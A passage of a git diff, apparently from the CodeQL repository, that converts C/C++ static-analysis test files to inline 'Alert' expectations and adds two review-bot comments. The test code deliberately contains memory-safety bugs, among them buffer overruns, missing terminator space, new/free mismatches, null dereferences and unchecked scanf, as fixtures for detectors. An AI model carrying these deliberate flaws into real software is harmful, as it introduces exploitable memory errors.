@@ -410,17 +410,17 @@ char *my_string_copy() { void scan_and_write() { { int i; - if (scanf("%d", &i) < 1) { + if (scanf("%d", &i) < 1) { // $ Source[cpp/missing-check-scanf] i = 0; } - use(i); // GOOD [FALSE POSITIVE]: variable is overwritten with a default value when scanf fails + use(i); // GOOD [FALSE POSITIVE]: variable is overwritten with a default value when scanf fails // $ Alert[cpp/missing-check-scanf] } { int i; - if (scanf("%d", &i) != 1) { + if (scanf("%d", &i) != 1) { // $ Source[cpp/missing-check-scanf] i = 0; } - use(i); // GOOD [FALSE POSITIVE]: variable is overwritten with a default value when scanf fails + use(i); // GOOD [FALSE POSITIVE]: variable is overwritten with a default value when scanf fails // $ Alert[cpp/missing-check-scanf] } } @@ -433,14 +433,14 @@ void scan_and_static_variable() { void bad_check() { { int i = 0; - if (scanf("%d", &i) != 0) { + if (scanf("%d", &i) != 0) { // $ Alert[cpp/incorrectly-checked-scanf] return; } use(i); // GOOD [FALSE POSITIVE]: Technically no security issue, but code is incorrect. } { int i = 0; - int r = scanf("%d", &i); + int r = scanf("%d", &i); // $ Alert[cpp/incorrectly-checked-scanf] if (!r) { return; } 
@@ -452,47 +452,47 @@ void bad_check() { void disjunct_boolean_condition(const char* modifier_data) { long value; - auto rc = sscanf(modifier_data, "%lx", &value); + auto rc = sscanf(modifier_data, "%lx", &value); // $ Source[cpp/missing-check-scanf] if((rc == EOF) || (rc == 0)) { return; } - use(value); // GOOD + use(value); // GOOD // $ Alert[cpp/missing-check-scanf] } void check_for_negative_test() { int res; int value; - res = scanf("%d", &value); // GOOD + res = scanf("%d", &value); // GOOD // $ Source[cpp/missing-check-scanf] if(res == 0) { return; } if (res < 0) { return; } - use(value); + use(value); // $ Alert[cpp/missing-check-scanf] } void multiple_checks() { { int i; - int res = scanf("%d", &i); + int res = scanf("%d", &i); // $ Source[cpp/missing-check-scanf] if (res >= 0) { if (res != 0) { - use(i); // GOOD: checks return value [FALSE POSITIVE] + use(i); // GOOD: checks return value [FALSE POSITIVE] // $ Alert[cpp/missing-check-scanf] } } } { int i; - int res = scanf("%d", &i); + int res = scanf("%d", &i); // $ Source[cpp/missing-check-scanf] if (res < 0) return; if (res != 0) { - use(i); // GOOD: checks return value [FALSE POSITIVE] + use(i); // GOOD: checks return value [FALSE POSITIVE] // $ Alert[cpp/missing-check-scanf] } } @@ -538,11 +538,11 @@ void switch_cases(const char *data) { float d, e, f; - switch (sscanf(data, "%f %f %f", &d, &e, &f)) { + switch (sscanf(data, "%f %f %f", &d, &e, &f)) { // $ Source[cpp/missing-check-scanf] case 2: use(d); // GOOD use(e); // GOOD - use(f); // BAD + use(f); // BAD // $ Alert[cpp/missing-check-scanf] break; case 3: use(d); // GOOD diff --git a/cpp/ql/test/query-tests/Critical/MissingNullTest/MissingNullTest.qlref b/cpp/ql/test/query-tests/Critical/MissingNullTest/MissingNullTest.qlref index f4e1c9888cb8..f9517d2a96f7 100644 --- a/cpp/ql/test/query-tests/Critical/MissingNullTest/MissingNullTest.qlref +++ b/cpp/ql/test/query-tests/Critical/MissingNullTest/MissingNullTest.qlref 
@@ -1 +1,2 @@ -Critical/MissingNullTest.ql \ No newline at end of file +query: Critical/MissingNullTest.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/MissingNullTest/test.cpp b/cpp/ql/test/query-tests/Critical/MissingNullTest/test.cpp index 73ebe8b56feb..6a5d98466f17 100644 --- a/cpp/ql/test/query-tests/Critical/MissingNullTest/test.cpp +++ b/cpp/ql/test/query-tests/Critical/MissingNullTest/test.cpp @@ -20,7 +20,7 @@ void test1(bool cond) y = *p; // BAD (p is uninitialized and could be 0) [NOT DETECTED] p = NULL; - y = *p; // BAD (p is 0) + y = *p; // BAD (p is 0) // $ Alert p = &x; y = *p; // GOOD (p points to x) p = q; @@ -32,7 +32,7 @@ void test1(bool cond) int *q = 0; memcpy(p, &y, sizeof(int)); // GOOD (p points to x) - memcpy(q, &y, sizeof(int)); // BAD (p is 0) + memcpy(q, &y, sizeof(int)); // BAD (p is 0) // $ Alert } { @@ -40,7 +40,7 @@ void test1(bool cond) int *q = 0; bcopy(&y, p, sizeof(int)); // GOOD (p points to x) - bcopy(&y, q, sizeof(int)); // BAD (p is 0) + bcopy(&y, q, sizeof(int)); // BAD (p is 0) // $ Alert } { @@ -48,14 +48,14 @@ void test1(bool cond) int *q = 0; mycopyint(&y, p); // GOOD (p points to x) - mycopyint(&y, q); // BAD (p is 0) + mycopyint(&y, q); // BAD (p is 0) // $ Alert } { int *p = 0; int *q = &x; - y = *p; // BAD (p is 0) + y = *p; // BAD (p is 0) // $ Alert memcpy(&p, &q, sizeof(p)); y = *p; // GOOD (p points to x) } @@ -64,7 +64,7 @@ void test1(bool cond) int *p = 0; int *q = &x; - y = *p; // BAD (p is 0) + y = *p; // BAD (p is 0) // $ Alert bcopy(&q, &p, sizeof(p)); y = *p; // GOOD (p points to x) } diff --git a/cpp/ql/test/query-tests/Critical/NewFree/NewArrayDeleteMismatch.qlref b/cpp/ql/test/query-tests/Critical/NewFree/NewArrayDeleteMismatch.qlref index 72039b834eb1..885b813268e5 100644 --- a/cpp/ql/test/query-tests/Critical/NewFree/NewArrayDeleteMismatch.qlref +++ b/cpp/ql/test/query-tests/Critical/NewFree/NewArrayDeleteMismatch.qlref 
@@ -1 +1,2 @@ -Critical/NewArrayDeleteMismatch.ql +query: Critical/NewArrayDeleteMismatch.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/NewFree/NewDeleteArrayMismatch.qlref b/cpp/ql/test/query-tests/Critical/NewFree/NewDeleteArrayMismatch.qlref index 0acb486d3005..93e6941508c7 100644 --- a/cpp/ql/test/query-tests/Critical/NewFree/NewDeleteArrayMismatch.qlref +++ b/cpp/ql/test/query-tests/Critical/NewFree/NewDeleteArrayMismatch.qlref @@ -1 +1,2 @@ -Critical/NewDeleteArrayMismatch.ql +query: Critical/NewDeleteArrayMismatch.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/NewFree/NewFreeMismatch.qlref b/cpp/ql/test/query-tests/Critical/NewFree/NewFreeMismatch.qlref index c7d3dfbdf085..f42f4eb16b90 100644 --- a/cpp/ql/test/query-tests/Critical/NewFree/NewFreeMismatch.qlref +++ b/cpp/ql/test/query-tests/Critical/NewFree/NewFreeMismatch.qlref @@ -1 +1,2 @@ -Critical/NewFreeMismatch.ql +query: Critical/NewFreeMismatch.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/NewFree/test.cpp b/cpp/ql/test/query-tests/Critical/NewFree/test.cpp index 0807eadb3338..bec4798a2b0f 100644 --- a/cpp/ql/test/query-tests/Critical/NewFree/test.cpp +++ b/cpp/ql/test/query-tests/Critical/NewFree/test.cpp @@ -33,12 +33,12 @@ void f1() void f2() { delete global_p1; // GOOD - delete global_p2; // BAD: malloc -> delete + delete global_p2; // BAD: malloc -> delete // $ Alert[cpp/new-free-mismatch] } void f3() { - free(global_p1); // BAD: new -> delete + free(global_p1); // BAD: new -> delete // $ Alert[cpp/new-free-mismatch] free(global_p2); // GOOD } 
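Review bot: The comment on `free(global_p1);` in `f3` (hunk `-33,12` of NewFree/test.cpp) says `new -> delete`, but the line releases the pointer with `free`, which is also what the added `Alert[cpp/new-free-mismatch]` expects. Since the line is rewritten anyway, the comment can be corrected in the same change: `free(global_p1); // BAD: new -> free // $ Alert[cpp/new-free-mismatch]`. That `global_p1` comes from `new` is inferred from `delete global_p1; // GOOD` in `f2`; the allocation itself is outside the hunk.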
@@ -65,15 +65,15 @@ int main() delete p1; // GOOD delete [] p2; // GOOD - delete p3; // BAD: malloc -> delete + delete p3; // BAD: malloc -> delete // $ Alert[cpp/new-free-mismatch] } { myClass *p1 = new myClass; myClass *p2 = new myClass[10]; myClass *p3 = (myClass *)malloc(sizeof(myClass)); - free(p1); // BAD: new -> free - free(p2); // BAD: new[] -> free + free(p1); // BAD: new -> free // $ Alert[cpp/new-free-mismatch] + free(p2); // BAD: new[] -> free // $ Alert[cpp/new-free-mismatch] free(p3); // GOOD } @@ -88,7 +88,7 @@ int main() myClass *p1 = (myClass *)my_malloc(sizeof(myClass)); myClass *p2 = (myClass *)my_malloc(sizeof(myClass)); - delete p1; // BAD: malloc -> delete + delete p1; // BAD: malloc -> delete // $ Alert[cpp/new-free-mismatch] free(p2); // GOOD } { @@ -96,7 +96,7 @@ int main() myClass *p2 = (myClass *)malloc(sizeof(myClass)); my_delete(p1); // GOOD - my_delete(p2); // BAD: malloc -> delete + my_delete(p2); // BAD: malloc -> delete // $ Alert[cpp/new-free-mismatch] } // overwritten @@ -135,7 +135,7 @@ void test2() void *b = my_malloc_2(10); free(a); // GOOD - delete b; // BAD: malloc -> delete + delete b; // BAD: malloc -> delete // $ Alert[cpp/new-free-mismatch] } void *my_malloc_3(size_t size) @@ -152,7 +152,7 @@ void test3() void *b = my_malloc_3(10); free(a); // GOOD - delete b; // BAD: malloc -> delete + delete b; // BAD: malloc -> delete // $ Alert[cpp/new-free-mismatch] } void test4(bool do_array_delete) @@ -162,11 +162,11 @@ void test4(bool do_array_delete) if (do_array_delete) { - delete [] mc; // BAD + delete [] mc; // BAD // $ Alert[cpp/new-delete-array-mismatch] delete [] mc_array; // GOOD } else { delete mc; // GOOD - delete mc_array; // BAD + delete mc_array; // BAD // $ Alert[cpp/new-array-delete-mismatch] } } @@ -179,7 +179,7 @@ void test5(bool do_array_delete) { delete [] c_array_ptr_2; // GOOD } else { - delete c_array_ptr_2; // BAD + delete c_array_ptr_2; // BAD // $ Alert[cpp/new-array-delete-mismatch] } } 
@@ -211,7 +211,7 @@ void test7(bool do_array_delete) { if (do_array_delete) { - delete [] global_mc; // BAD + delete [] global_mc; // BAD // $ Alert[cpp/new-delete-array-mismatch] } else { delete global_mc; // GOOD } @@ -229,15 +229,15 @@ void test8(bool cond) } free(a); // GOOD - delete a; // BAD: malloc -> delete - delete [] a; // BAD: malloc -> delete[] + delete a; // BAD: malloc -> delete // $ Alert[cpp/new-free-mismatch] + delete [] a; // BAD: malloc -> delete[] // $ Alert[cpp/new-free-mismatch] - free(b); // BAD: new -> free + free(b); // BAD: new -> free // $ Alert[cpp/new-free-mismatch] delete b; // GOOD - delete [] b; // BAD: new -> delete[] + delete [] b; // BAD: new -> delete[] // $ Alert[cpp/new-delete-array-mismatch] - free(c); // BAD: new[] -> free - delete c; // BAD: new[] -> delete + free(c); // BAD: new[] -> free // $ Alert[cpp/new-free-mismatch] + delete c; // BAD: new[] -> delete // $ Alert[cpp/new-array-delete-mismatch] delete [] c; // GOOD } @@ -268,8 +268,8 @@ class ClassWithMembers ~ClassWithMembers() { delete a; // GOOD - delete [] b; // BAD: new -> delete[] - free(c); // BAD: new -> free + delete [] b; // BAD: new -> delete[] // $ Alert[cpp/new-delete-array-mismatch] + free(c); // BAD: new -> free // $ Alert[cpp/new-free-mismatch] } private: @@ -292,7 +292,7 @@ static void map_init() static void map_shutdown() { - delete map; // BAD: new[] -> delete + delete map; // BAD: new[] -> delete // $ Alert[cpp/new-array-delete-mismatch] map = 0; } @@ -307,7 +307,7 @@ class Test10 ~Test10() { - delete data; // BAD: new[] -> delete + delete data; // BAD: new[] -> delete // $ Alert[cpp/new-array-delete-mismatch] } char *data; @@ -332,7 +332,7 @@ class Test11 ~Test11() { - delete data; // BAD: new[] -> delete + delete data; // BAD: new[] -> delete // $ Alert[cpp/new-array-delete-mismatch] } char *data; 
@@ -438,10 +438,10 @@ void test14() wchar_t *s5 = wcsdup(L"string"); wchar_t *s6 = wcsdup(L"string"); - delete s1; // BAD: strdup -> delete + delete s1; // BAD: strdup -> delete // $ Alert[cpp/new-free-mismatch] free(s2); // GOOD - delete s3; // BAD: strndup -> delete + delete s3; // BAD: strndup -> delete // $ Alert[cpp/new-free-mismatch] free(s4); // GOOD - delete s5; // BAD: wcsdup -> delete + delete s5; // BAD: wcsdup -> delete // $ Alert[cpp/new-free-mismatch] free(s6); // GOOD } diff --git a/cpp/ql/test/query-tests/Critical/NewFree/test2.cpp b/cpp/ql/test/query-tests/Critical/NewFree/test2.cpp index 43a286f6f97f..a39ff1c4ee97 100644 --- a/cpp/ql/test/query-tests/Critical/NewFree/test2.cpp +++ b/cpp/ql/test/query-tests/Critical/NewFree/test2.cpp @@ -16,14 +16,14 @@ class MyTest2Class MyTest2Class() { int *a = new int; - free(a); // BAD + free(a); // BAD // $ Alert[cpp/new-free-mismatch] int *ptr_b = (int *)malloc(sizeof(int)); int *b = new(ptr_b) int; free(b); // GOOD c = new int; - free(c); // BAD + free(c); // BAD // $ Alert[cpp/new-free-mismatch] int *ptr_d = (int *)malloc(sizeof(int)); d = new(ptr_d) int; @@ -48,13 +48,13 @@ void test_operator_new() delete ptr_new; // GOOD ::operator delete(ptr_new); // GOOD - free(ptr_new); // BAD + free(ptr_new); // BAD // $ Alert[cpp/new-free-mismatch] delete ptr_opnew; // GOOD ::operator delete(ptr_opnew); // GOOD - free(ptr_opnew); // BAD + free(ptr_opnew); // BAD // $ Alert[cpp/new-free-mismatch] - delete ptr_malloc; // BAD - ::operator delete(ptr_malloc); // BAD + delete ptr_malloc; // BAD // $ Alert[cpp/new-free-mismatch] + ::operator delete(ptr_malloc); // BAD // $ Alert[cpp/new-free-mismatch] free(ptr_malloc); // GOOD } diff --git a/cpp/ql/test/query-tests/Critical/NotInitialised/NotInitialised.qlref b/cpp/ql/test/query-tests/Critical/NotInitialised/NotInitialised.qlref index b261c020f534..2a0f2052bea8 100644 --- a/cpp/ql/test/query-tests/Critical/NotInitialised/NotInitialised.qlref 
+++ b/cpp/ql/test/query-tests/Critical/NotInitialised/NotInitialised.qlref @@ -1 +1,2 @@ -Critical/NotInitialised.ql \ No newline at end of file +query: Critical/NotInitialised.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/NotInitialised/test.cpp b/cpp/ql/test/query-tests/Critical/NotInitialised/test.cpp index bc9093cd53de..c83dabba53d2 100644 --- a/cpp/ql/test/query-tests/Critical/NotInitialised/test.cpp +++ b/cpp/ql/test/query-tests/Critical/NotInitialised/test.cpp @@ -1,6 +1,6 @@ void test1() { int local; - int x = local; // BAD + int x = local; // BAD // $ Alert static int static_local; int y = static_local; // GOOD @@ -9,7 +9,7 @@ void test1() { int z = initialised; // GOOD } -int uninitialised_global; // BAD +int uninitialised_global; // BAD // $ Alert static int uninitialised_static_global; // GOOD int initialized_global = 0; // GOOD diff --git a/cpp/ql/test/query-tests/Critical/OverflowCalculated/NoSpaceForZeroTerminator.qlref b/cpp/ql/test/query-tests/Critical/OverflowCalculated/NoSpaceForZeroTerminator.qlref index 53beb09ebd71..0459fddee60f 100644 --- a/cpp/ql/test/query-tests/Critical/OverflowCalculated/NoSpaceForZeroTerminator.qlref +++ b/cpp/ql/test/query-tests/Critical/OverflowCalculated/NoSpaceForZeroTerminator.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-131/NoSpaceForZeroTerminator.ql +query: Security/CWE/CWE-131/NoSpaceForZeroTerminator.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/OverflowCalculated/OverflowCalculated.qlref b/cpp/ql/test/query-tests/Critical/OverflowCalculated/OverflowCalculated.qlref index 9895980e2411..7625942ee0f5 100644 --- a/cpp/ql/test/query-tests/Critical/OverflowCalculated/OverflowCalculated.qlref +++ b/cpp/ql/test/query-tests/Critical/OverflowCalculated/OverflowCalculated.qlref 
@@ -1 +1,2 @@ -Critical/OverflowCalculated.ql +query: Critical/OverflowCalculated.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/OverflowCalculated/tests1.cpp b/cpp/ql/test/query-tests/Critical/OverflowCalculated/tests1.cpp index a47679bafc24..8cbaaf3c2e7d 100644 --- a/cpp/ql/test/query-tests/Critical/OverflowCalculated/tests1.cpp +++ b/cpp/ql/test/query-tests/Critical/OverflowCalculated/tests1.cpp @@ -23,7 +23,7 @@ void tests1(int case_num) switch (case_num) { case 1: - buffer = (char *)malloc(strlen(str)); // BAD + buffer = (char *)malloc(strlen(str)); // BAD // $ Alert[cpp/no-space-for-terminator] strcpy(buffer, str); break; @@ -33,7 +33,7 @@ void tests1(int case_num) break; case 3: - buffer = (char *)malloc(strlen(str) * sizeof(char)); // BAD + buffer = (char *)malloc(strlen(str) * sizeof(char)); // BAD // $ Alert[cpp/no-space-for-terminator] strcpy(buffer, str); break; @@ -53,7 +53,7 @@ void tests1(int case_num) break; case 7: - buffer = (char *)realloc(buffer, strlen(str)); // BAD + buffer = (char *)realloc(buffer, strlen(str)); // BAD // $ Alert[cpp/no-space-for-terminator] strcpy(buffer, str); break; @@ -64,7 +64,7 @@ void tests1(int case_num) case 9: int len1 = strlen(str); - buffer = (char *)malloc(len1); // BAD + buffer = (char *)malloc(len1); // BAD // $ Alert[cpp/no-space-for-terminator] strcpy(buffer, str); break; @@ -86,7 +86,7 @@ void tests1(int case_num) break; case 101: - wbuffer = (wchar_t *)malloc(wcslen(wstr)); // BAD + wbuffer = (wchar_t *)malloc(wcslen(wstr)); // BAD // $ Alert[cpp/no-space-for-terminator] wcscpy(wbuffer, wstr); break; @@ -106,7 +106,7 @@ void tests1(int case_num) break; case 105: - wbuffer = (wchar_t *)malloc(wcslen(wstr) * sizeof(wchar_t)); // BAD + wbuffer = (wchar_t *)malloc(wcslen(wstr) * sizeof(wchar_t)); // BAD // $ Alert[cpp/no-space-for-terminator] wcscpy(wbuffer, wstr); break; 
diff --git a/cpp/ql/test/query-tests/Critical/OverflowCalculated/tests2.cpp b/cpp/ql/test/query-tests/Critical/OverflowCalculated/tests2.cpp index 696b566329a3..db6928a7015a 100644 --- a/cpp/ql/test/query-tests/Critical/OverflowCalculated/tests2.cpp +++ b/cpp/ql/test/query-tests/Critical/OverflowCalculated/tests2.cpp @@ -31,7 +31,7 @@ void tests2(int case_num) case 1: buffer = (char *)malloc(strlen(str1) + 1); // BAD strcpy(buffer, str1); - strcat(buffer, str2); + strcat(buffer, str2); // $ Alert[cpp/overflow-calculated] break; case 2: @@ -49,7 +49,7 @@ void tests2(int case_num) case 4: buffer = (char *)malloc((strlen(str1) + 1) * sizeof(char)); // BAD strcpy(buffer, str1); - strcat(buffer, str2); + strcat(buffer, str2); // $ Alert[cpp/overflow-calculated] break; case 5: diff --git a/cpp/ql/test/query-tests/Critical/OverflowCalculated/tests3.cpp b/cpp/ql/test/query-tests/Critical/OverflowCalculated/tests3.cpp index 7a2cc19d269c..c50addfdd50e 100644 --- a/cpp/ql/test/query-tests/Critical/OverflowCalculated/tests3.cpp +++ b/cpp/ql/test/query-tests/Critical/OverflowCalculated/tests3.cpp @@ -22,12 +22,12 @@ void tests3(int case_num) switch (case_num) { case 1: - buffer = (char *)std::malloc(strlen(str3global)); // BAD + buffer = (char *)std::malloc(strlen(str3global)); // BAD // $ Alert[cpp/no-space-for-terminator] strcpy(buffer, str3global); break; case 2: - buffer = (char *)std::malloc(strlen(str3local)); // BAD + buffer = (char *)std::malloc(strlen(str3local)); // BAD // $ Alert[cpp/no-space-for-terminator] strcpy(buffer, str3local); break; @@ -50,7 +50,7 @@ void tests3(int case_num) void test3b() { - char *buffer = new char[strlen(str3global)]; // BAD + char *buffer = new char[strlen(str3global)]; // BAD // $ Alert[cpp/no-space-for-terminator] strcpy(buffer, str3global); 
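Review bot: In cases 1 and 4 of `tests2` the `// BAD` marker stays on the `malloc(strlen(str1) + 1)` line while the new expectation `// $ Alert[cpp/overflow-calculated]` goes on the `strcat(buffer, str2);` line, so the human-readable marker and the machine-checked one now point at different lines. A short comment on the flagged line would make the relationship explicit, e.g. `strcat(buffer, str2); // BAD: buffer was sized for str1 only // $ Alert[cpp/overflow-calculated]`. The `switch` these cases belong to starts and ends outside both hunks (`-31,7` and `-49,7`).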
@@ -78,9 +78,9 @@ void tests4() char *buffer1 = 0; char *buffer2 = 0; - buffer1 = (char *)MyMalloc1(strlen(str4)); // BAD + buffer1 = (char *)MyMalloc1(strlen(str4)); // BAD // $ Alert[cpp/no-space-for-terminator] strcpy(buffer1, str4); - buffer2 = (char *)MyMalloc2(strlen(str4)); // BAD + buffer2 = (char *)MyMalloc2(strlen(str4)); // BAD // $ Alert[cpp/no-space-for-terminator] strcpy(buffer2, str4); } diff --git a/cpp/ql/test/query-tests/Critical/OverflowStatic/OverflowStatic.qlref b/cpp/ql/test/query-tests/Critical/OverflowStatic/OverflowStatic.qlref index 477af9d71d07..93d88e7802a0 100644 --- a/cpp/ql/test/query-tests/Critical/OverflowStatic/OverflowStatic.qlref +++ b/cpp/ql/test/query-tests/Critical/OverflowStatic/OverflowStatic.qlref @@ -1 +1,2 @@ -Critical/OverflowStatic.ql +query: Critical/OverflowStatic.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/OverflowStatic/test.c b/cpp/ql/test/query-tests/Critical/OverflowStatic/test.c index 3c726a452b9b..9072df0feb6c 100644 --- a/cpp/ql/test/query-tests/Critical/OverflowStatic/test.c +++ b/cpp/ql/test/query-tests/Critical/OverflowStatic/test.c @@ -11,14 +11,14 @@ void f(void) { c = xs[-1]; // BAD [NOT DETECTED] c = xs[0]; // GOOD c = xs[4]; // GOOD - c = xs[5]; // BAD - c = xs[6]; // BAD + c = xs[5]; // BAD // $ Alert + c = xs[6]; // BAD // $ Alert c = stru.ys[-1]; // BAD [NOT DETECTED] c = stru.ys[0]; // GOOD c = stru.ys[4]; // GOOD - c = stru.ys[5]; // BAD - c = stru.ys[6]; // BAD + c = stru.ys[5]; // BAD // $ Alert + c = stru.ys[6]; // BAD // $ Alert c = stru.zs[-1]; // BAD [NOT DETECTED] c = stru.zs[0]; // GOOD (zs is variable size) diff --git a/cpp/ql/test/query-tests/Critical/OverflowStatic/test.cpp b/cpp/ql/test/query-tests/Critical/OverflowStatic/test.cpp index deeb70ffd57d..0248f71e30b5 100644 --- a/cpp/ql/test/query-tests/Critical/OverflowStatic/test.cpp +++ b/cpp/ql/test/query-tests/Critical/OverflowStatic/test.cpp 
@@ -16,14 +16,14 @@ void f1(void) } for (i = 0; i < 4; i++) { - buffer1[i] = 0; // BAD - buffer2[i] = 0; // BAD + buffer1[i] = 0; // BAD // $ Alert + buffer2[i] = 0; // BAD // $ Alert } memcpy(buffer1, buffer2, 3); // GOOD - memcpy(buffer1, buffer2, 4); // BAD + memcpy(buffer1, buffer2, 4); // BAD // $ Alert memcpy(buffer2, buffer1, 3); // GOOD - memcpy(buffer2, buffer1, 4); // BAD + memcpy(buffer2, buffer1, 4); // BAD // $ Alert } void f2(char *src) @@ -37,7 +37,7 @@ void f2(char *src) amount = amount + 1; memcpy(buffer, src, amount); // BAD [NOT DETECTED] amount = 101; - memcpy(buffer, src, amount); // BAD + memcpy(buffer, src, amount); // BAD // $ Alert ptr = buffer; memcpy(ptr, src, 101); // BAD [NOT DETECTED] diff --git a/cpp/ql/test/query-tests/Critical/OverflowStatic/test2.c b/cpp/ql/test/query-tests/Critical/OverflowStatic/test2.c index cd836d759880..f1f28fbc76e0 100644 --- a/cpp/ql/test/query-tests/Critical/OverflowStatic/test2.c +++ b/cpp/ql/test/query-tests/Critical/OverflowStatic/test2.c 
@@ -25,14 +25,14 @@ size_t fread(void *ptr, size_t size, size_t nmemb, FILE *stream); void bad0(char *src, FILE *f, va_list ap) { char buffer[40]; - fgets(buffer, 41, f); // BAD: Too many characters read - strncpy(buffer, src, 43); // BAD: Too many characters copied + fgets(buffer, 41, f); // BAD: Too many characters read // $ Alert + strncpy(buffer, src, 43); // BAD: Too many characters copied // $ Alert buffer[0] = 0; - strncat(buffer, src, 44); // BAD: Too many characters copied - memcpy(buffer, src, 45); // BAD: Too many characters copied - memmove(buffer, src, 46); // BAD: Too many characters copied - snprintf(buffer, 47, "%s", src); // BAD: Too many characters copied - vsnprintf(buffer, 48, "%s", ap); // BAD: Too many characters copied + strncat(buffer, src, 44); // BAD: Too many characters copied // $ Alert + memcpy(buffer, src, 45); // BAD: Too many characters copied // $ Alert + memmove(buffer, src, 46); // BAD: Too many characters copied // $ Alert + snprintf(buffer, 47, "%s", src); // BAD: Too many characters copied // $ Alert + vsnprintf(buffer, 48, "%s", ap); // BAD: Too many characters copied // $ Alert } void good0(char *src, FILE *f, va_list ap) { diff --git a/cpp/ql/test/query-tests/Critical/ReturnValueIgnored/ReturnValueIgnored.qlref b/cpp/ql/test/query-tests/Critical/ReturnValueIgnored/ReturnValueIgnored.qlref index 102d4b7138ce..cd7a89e3ea59 100644 --- a/cpp/ql/test/query-tests/Critical/ReturnValueIgnored/ReturnValueIgnored.qlref +++ b/cpp/ql/test/query-tests/Critical/ReturnValueIgnored/ReturnValueIgnored.qlref @@ -1 +1,2 @@ -Critical/ReturnValueIgnored.ql +query: Critical/ReturnValueIgnored.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/ReturnValueIgnored/test.cpp b/cpp/ql/test/query-tests/Critical/ReturnValueIgnored/test.cpp index 4fbf1f00e33f..f5f138faea5c 100644 --- a/cpp/ql/test/query-tests/Critical/ReturnValueIgnored/test.cpp 
+++ b/cpp/ql/test/query-tests/Critical/ReturnValueIgnored/test.cpp @@ -29,7 +29,7 @@ int main() check(myFunction()); // GOOD - myFunction(); // BAD (return value is ignored) + myFunction(); // BAD (return value is ignored) // $ Alert (void)myFunction(); // GOOD } diff --git a/cpp/ql/test/query-tests/Critical/SizeCheck/SizeCheck2.qlref b/cpp/ql/test/query-tests/Critical/SizeCheck/SizeCheck2.qlref index ca677973aea1..b23dbb86fd80 100644 --- a/cpp/ql/test/query-tests/Critical/SizeCheck/SizeCheck2.qlref +++ b/cpp/ql/test/query-tests/Critical/SizeCheck/SizeCheck2.qlref @@ -1 +1,2 @@ -Critical/SizeCheck2.ql +query: Critical/SizeCheck2.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/SizeCheck/test2.c b/cpp/ql/test/query-tests/Critical/SizeCheck/test2.c index 714ca5de9c88..2dedb4e9047a 100644 --- a/cpp/ql/test/query-tests/Critical/SizeCheck/test2.c +++ b/cpp/ql/test/query-tests/Critical/SizeCheck/test2.c @@ -13,8 +13,8 @@ void free(void *ptr); void bad0(void) { - long long *lptr = malloc(27); // BAD -- Not a multiple of sizeof(long long) - double *dptr = malloc(33); // BAD -- Not a multiple of sizeof(double) + long long *lptr = malloc(27); // BAD -- Not a multiple of sizeof(long long) // $ Alert + double *dptr = malloc(33); // BAD -- Not a multiple of sizeof(double) // $ Alert free(lptr); free(dptr); } @@ -29,8 +29,8 @@ void good0(void) { void bad1(void) { - long long *lptr = malloc(sizeof(long long)*7/2); // BAD -- Not a multiple of sizeof(long long) - double *dptr = malloc(sizeof(double)*5/2); // BAD -- Not a multiple of sizeof(double) + long long *lptr = malloc(sizeof(long long)*7/2); // BAD -- Not a multiple of sizeof(long long) // $ Alert + double *dptr = malloc(sizeof(double)*5/2); // BAD -- Not a multiple of sizeof(double) // $ Alert free(lptr); free(dptr); } 
@@ -82,5 +82,5 @@ void varStructTests() { MyVarStruct1 *a = malloc(sizeof(MyVarStruct1) + 127); // GOOD MyVarStruct2 *b = malloc(sizeof(MyVarStruct2) + 127); // GOOD MyVarStruct3 *c = malloc(sizeof(MyVarStruct3) + 127); // GOOD - MyFixedStruct *d = malloc(sizeof(MyFixedStruct) + 127); // BAD --- Not a multiple of sizeof(MyFixedStruct) + MyFixedStruct *d = malloc(sizeof(MyFixedStruct) + 127); // BAD --- Not a multiple of sizeof(MyFixedStruct) // $ Alert } diff --git a/cpp/ql/test/query-tests/Critical/UnsafeUseOfThis/UnsafeUseOfThis.qlref b/cpp/ql/test/query-tests/Critical/UnsafeUseOfThis/UnsafeUseOfThis.qlref index 086427166cb0..9c104719c2c0 100644 --- a/cpp/ql/test/query-tests/Critical/UnsafeUseOfThis/UnsafeUseOfThis.qlref +++ b/cpp/ql/test/query-tests/Critical/UnsafeUseOfThis/UnsafeUseOfThis.qlref @@ -1 +1 @@ -Likely Bugs/OO/UnsafeUseOfThis.ql \ No newline at end of file +query: Likely Bugs/OO/UnsafeUseOfThis.ql diff --git a/cpp/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref b/cpp/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref index e900e9c5314b..58bc903a431d 100644 --- a/cpp/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref +++ b/cpp/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref @@ -1 +1 @@ -Diagnostics/ExtractedFiles.ql +query: Diagnostics/ExtractedFiles.ql diff --git a/cpp/ql/test/query-tests/Diagnostics/ExtractionErrors.qlref b/cpp/ql/test/query-tests/Diagnostics/ExtractionErrors.qlref index 1bf951f18994..9f9498e49c7f 100644 --- a/cpp/ql/test/query-tests/Diagnostics/ExtractionErrors.qlref +++ b/cpp/ql/test/query-tests/Diagnostics/ExtractionErrors.qlref @@ -1 +1 @@ -Diagnostics/Internal/ExtractionErrors.ql +query: Diagnostics/Internal/ExtractionErrors.ql diff --git a/cpp/ql/test/query-tests/Diagnostics/ExtractionWarnings.qlref b/cpp/ql/test/query-tests/Diagnostics/ExtractionWarnings.qlref index 2df3d933e8ae..68969e9bbf1c 100644 --- a/cpp/ql/test/query-tests/Diagnostics/ExtractionWarnings.qlref 
